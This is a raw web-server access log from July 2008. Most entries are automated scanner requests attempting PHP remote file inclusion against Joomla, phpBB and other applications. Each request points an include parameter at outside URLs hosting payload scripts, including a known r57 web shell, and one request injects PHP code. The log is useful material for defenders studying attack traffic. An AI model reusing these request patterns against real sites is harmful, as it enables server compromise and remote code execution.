209.51.219.170 - - [29/Jul/2008:06:09:58 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shra.net/rar.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:06:09:58 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shra.net/rar.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
89.111.179.12 - - [29/Jul/2008:06:10:25 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:06:10:26 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:06:10:43 -0500] "GET /logs/order?page=plan_showinclude.php?path[docroot]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:06:10:43 -0500] "GET /order?page=plan_showinclude.php?path[docroot]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.26.63.17 - - [29/Jul/2008:06:10:49 -0500] "GET /logs/access_log.1212883200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:06:10:49 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:06:10:57 -0500] "GET /logs/access_log.1213142400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
209.97.201.148 - - [29/Jul/2008:06:12:51 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:06:12:51 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
209.51.219.170 - - [29/Jul/2008:06:15:21 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:06:15:22 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
204.9.124.118 - - [29/Jul/2008:06:16:00 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
204.9.124.118 - - [29/Jul/2008:06:16:00 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
209.51.219.170 - - [29/Jul/2008:06:17:10 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:06:17:10 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
69.73.165.251 - - [29/Jul/2008:06:17:23 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.73.165.251 - - [29/Jul/2008:06:17:23 -0500] "GET //atom.php5?page=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.73.165.251 - - [29/Jul/2008:06:17:23 -0500] "GET /logs//atom.php5?page=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.220.163.9 - - [29/Jul/2008:06:17:26 -0500] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:06:17:26 -0500] "GET //includes/dbal.php?eqdkp_root_path=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:06:17:39 -0500] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:06:17:39 -0500] "GET //includes/dbal.php?eqdkp_root_path=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
62.149.205.38 - - [29/Jul/2008:06:18:36 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
62.149.205.38 - - [29/Jul/2008:06:18:36 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
193.207.106.54 - - [29/Jul/2008:06:18:44 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:06:18:44 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
209.51.219.170 - - [29/Jul/2008:06:20:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://shra.net/rar.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:06:20:43 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://shra.net/rar.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
89.108.90.121 - - [29/Jul/2008:06:23:15 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:06:23:18 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.99.76.3 - - [29/Jul/2008:06:25:05 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:06:25:06 -0500] "GET /phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:06:25:25 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:06:25:25 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
62.75.240.22 - - [29/Jul/2008:06:27:06 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:27:07 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
88.84.151.157 - - [29/Jul/2008:06:30:29 -0500] "GET /logs/!scanhttp://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:06:30:29 -0500] "GET /!scanhttp://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
87.118.110.139 - - [29/Jul/2008:06:33:53 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
87.118.110.139 - - [29/Jul/2008:06:33:54 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
74.6.18.231 - - [29/Jul/2008:06:33:55 -0500] "GET /logs/access_log.1212883200 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
205.234.198.225 - - [29/Jul/2008:06:36:08 -0500] "GET /logs/access_log.1216425600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
205.234.198.225 - - [29/Jul/2008:06:36:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
205.234.198.225 - - [29/Jul/2008:06:36:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
205.234.198.225 - - [29/Jul/2008:06:36:52 -0500] "GET /logs/access_log.1216598400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
87.118.110.139 - - [29/Jul/2008:06:37:37 -0500] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
87.118.110.139 - - [29/Jul/2008:06:37:40 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:39:25 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:39:26 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
74.6.18.231 - - [29/Jul/2008:06:39:51 -0500] "GET /logs/access_log.1178323200 HTTP/1.0" 200 166574 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [29/Jul/2008:06:40:43 -0500] "GET /logs/access_log.1211500800 HTTP/1.0" 200 353639 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.83.113.49 - - [29/Jul/2008:06:40:46 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.812"
80.83.113.49 - - [29/Jul/2008:06:40:46 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
205.234.198.225 - - [29/Jul/2008:06:41:17 -0500] "GET /logs/access_log.1216339200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
74.6.18.231 - - [29/Jul/2008:06:42:02 -0500] "GET /logs/access_log.1214611200 HTTP/1.0" 200 459188 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
205.234.195.151 - - [29/Jul/2008:06:42:14 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
205.234.195.151 - - [29/Jul/2008:06:42:15 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.191.6.148 - - [29/Jul/2008:06:42:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93166 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:06:42:34 -0500] "GET //?path%5Bdocroot%5D=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
62.180.225.38 - - [29/Jul/2008:06:42:39 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
62.180.225.38 - - [29/Jul/2008:06:42:39 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
200.99.76.3 - - [29/Jul/2008:06:42:41 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:06:42:42 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:06:43:54 -0500] "GET /logs/join.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:06:43:54 -0500] "GET /join.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
62.75.240.22 - - [29/Jul/2008:06:43:55 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:43:55 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:43:56 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.94.30.30 - - [29/Jul/2008:06:44:05 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:44:05 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:44:05 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:45:19 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:45:19 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:45:19 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:46:28 -0500] "GET /logs/access_log.1212883200//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:06:47:16 -0500] "GET /logs/access_log.1212883200//Neos_Chronos/header.php?base_folder=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:06:48:34 -0500] "GET /logs//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:06:48:34 -0500] "GET //errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
62.152.41.170 - - [29/Jul/2008:06:50:43 -0500] "GET /logs/dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.79"
62.152.41.170 - - [29/Jul/2008:06:50:44 -0500] "GET /dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
62.180.225.38 - - [29/Jul/2008:06:51:22 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
62.180.225.38 - - [29/Jul/2008:06:51:23 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
62.180.225.38 - - [29/Jul/2008:06:51:23 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
62.75.240.22 - - [29/Jul/2008:06:53:33 -0500] "GET /logs/access_log.1214438400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
74.50.13.190 - - [29/Jul/2008:06:54:26 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.812"
74.50.13.190 - - [29/Jul/2008:06:54:26 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
74.50.13.190 - - [29/Jul/2008:06:54:27 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.812"
62.152.41.170 - - [29/Jul/2008:06:55:37 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
62.152.41.170 - - [29/Jul/2008:06:55:38 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
62.75.240.22 - - [29/Jul/2008:06:55:44 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:55:44 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:55:44 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:55:46 -0500] "GET /logs/access_log.1213315200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:06:55:49 -0500] "GET /logs/access_log.1213142400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
216.239.0.245 - - [29/Jul/2008:06:55:51 -0500] "GET /logs///%7Ejackal/donata/html/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
216.239.0.245 - - [29/Jul/2008:06:55:52 -0500] "GET ///%7Ejackal/donata/html/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
213.133.102.211 - - [29/Jul/2008:06:55:57 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.806"
213.133.102.211 - - [29/Jul/2008:06:55:57 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.806"
87.106.214.193 - - [29/Jul/2008:06:56:10 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
87.106.214.193 - - [29/Jul/2008:06:56:10 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.214.193 - - [29/Jul/2008:06:56:11 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
70.85.201.66 - - [29/Jul/2008:06:56:39 -0500] "GET /logs//atom.php5?page=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.85.201.66 - - [29/Jul/2008:06:56:44 -0500] "GET //atom.php5?page=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
62.180.225.38 - - [29/Jul/2008:06:56:45 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
62.180.225.38 - - [29/Jul/2008:06:56:45 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
62.180.225.38 - - [29/Jul/2008:06:56:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
91.125.167.203 - - [29/Jul/2008:06:57:44 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:47 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:48 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:48 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:57:48 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:58:11 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.125.167.203 - - [29/Jul/2008:06:58:13 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
